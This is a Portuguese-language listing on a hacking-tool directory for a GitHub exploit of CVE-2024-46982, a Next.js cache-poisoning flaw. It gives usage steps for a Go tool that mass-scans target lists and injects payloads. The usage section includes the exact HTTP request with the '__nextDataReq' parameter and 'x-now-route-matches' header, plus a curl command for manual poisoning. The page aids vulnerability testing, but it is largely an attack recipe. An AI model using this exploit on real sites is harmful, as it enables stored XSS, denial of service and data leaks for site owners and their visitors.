Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-46982 — Prova de Conceito CVE-2024-46982 | Kitploit
Ferramentas/GitHubGitHub/lercas/cve-2024-46982
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança Web
GitHublercas/cve-2024-46982

CVE-2024-46982

Prova de Conceito CVE-2024-46982

Ver Repositório
51há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Exploração de Envenenamento de Cache no Next.js

Esta ferramenta automatiza a detecção e a exploração da CVE-2024-46982, uma vulnerabilidade de envenenamento de cache no Next.js, em que respostas de Renderização no Lado do Servidor (SSR) podem ser incorretamente armazenadas em cache como Geração de Site Estático (SSG). Essa configuração incorreta pode levar a XSS Armazenado, DoS e vazamento de dados, permitindo que atacantes injetem conteúdo malicioso em respostas em cache.

Instalação e Uso

Prepare sua lista de alvos

Crie um arquivo chamado targets.txt contendo uma URL de destino por linha:

root@kitploit:~
https://vulnerable-site.com
https://another-target.com

Defina payloads personalizados

Crie um arquivo chamado payloads.txt contendo payloads que serão injetados por meio do cabeçalho User-Agent:

root@kitploit:~

Execute o exploit

Compile e execute o exploit com:

root@kitploit:~
go run exploit.go -f targets.txt -p payloads.txt -d 5

Como Funciona

  • Lê a lista de URLs de destino de targets.txt
  • Itera por cada destino e acrescenta o endpoint vulnerável:
root@kitploit:~
GET /poc?__nextDataReq=1 HTTP/1.1
Host: vulnerable-site.com
User-Agent: <PAYLOAD>
x-now-route-matches: 1
  • Envia várias solicitações, cada uma usando um payload diferente de payloads.txt
  • Analisa a resposta HTTP em busca de sinais de injeção bem-sucedida:
    • Se o payload aparecer no corpo da resposta → O destino está vulnerável
    • Se o código de resposta for 200 OK e o comportamento de cache estiver anormal → Potencialmente vulnerável
    • Se o código de resposta for 403 Forbidden ou 404 Not Found → Provavelmente corrigido
  • Exibe os resultados após testar todos os destinos

Para verificar manualmente:

Envie uma solicitação maliciosa usando curl:

root@kitploit:~
curl -X GET "https://vulnerable-site.com/poc?__nextDataReq=1" \
     -H "User-Agent: " \
     -H "x-now-route-matches: 1"

Visite o endpoint em um navegador

Requisitos

  • Go 1.21 ou mais recente.
Baixar ferramenta